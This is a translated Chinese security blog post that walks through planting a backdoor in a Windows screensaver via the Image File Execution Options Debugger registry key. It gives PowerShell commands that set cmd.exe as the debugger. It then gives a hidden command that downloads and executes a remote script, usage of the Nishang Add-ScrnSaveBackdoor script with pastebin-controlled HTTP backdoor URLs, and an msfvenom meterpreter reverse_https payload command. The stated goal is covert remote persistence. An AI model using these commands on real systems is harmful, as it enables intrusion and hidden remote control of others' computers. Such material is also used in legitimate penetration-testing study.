最近我看了一个帖子,它介绍了如何使用flash 屏幕保护程序绕过windows锁屏,这确实是一个很有意思的小技巧,但是也有他的局限性,因为你必须要物理上接触这台机器。但是经过我的研究,发现实际上不接触物理机就可以远程获取机器的控制权,这样就方便我们留一个隐蔽的后门了。
让我们一起看下
首先在powershell下我们运行下面的命令
PS C:\nishang> New-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ribbons.scr"
PS C:\nishang> Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ribbons.scr" -Name Debugger -Value cmd.exe
这样我们便给Ribbons(中文名:彩带)屏保添加了一个cmd后门,当屏保启动时,一个cmd命令行就出现了,如图:
但是这需要我们物理上接触这台机器,才能使用该后门。
当然还有更好的方法,我们可以使用下面的命令来种植后门,当屏保启动的时候,机器会从远程下载一个powershell脚本然后执行。
PS C:\nishang> Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ribbons.scr" -Name Debugger -Value "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.254.1/Evil.ps1'))"为了让他看上去不是那么可疑,我们使用Add-ScrnSaveBackdoor这个脚本。
Add-ScrnSaveBackdoor
使用下面的命令可以从powershell执行一个HTTP-Backdoor
PS C:\nishang> Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/Powerpreter.psm1 -Arguments HTTP-Backdoor
http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis
使用下面的命令可以返回一个meterpreter,当然首先要用msfvenom生成一个powershell (./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.254.226 -f powershell)
PS C:\nishang> Add-ScrnSaveBackdoor -PayloadURL
http://192.168.254.1/code_exec.ps1
好的!在powershell的帮助下,我们已经可以远程的获取计算机控制权,当然你也可以使用其他的powershell脚本来执行不同的命令。
Add-ScrnSaveBackdoor脚本下载地址:
https://github.com/samratashok/nishang
视频演示稍后补充
本文由 360安全播报 翻译,转载请注明“转自360安全播报”,并附上链接。
原文链接:http://www.labofapenetrationtester.com/2015/02/using-windows-screensaver-as-backdoor.html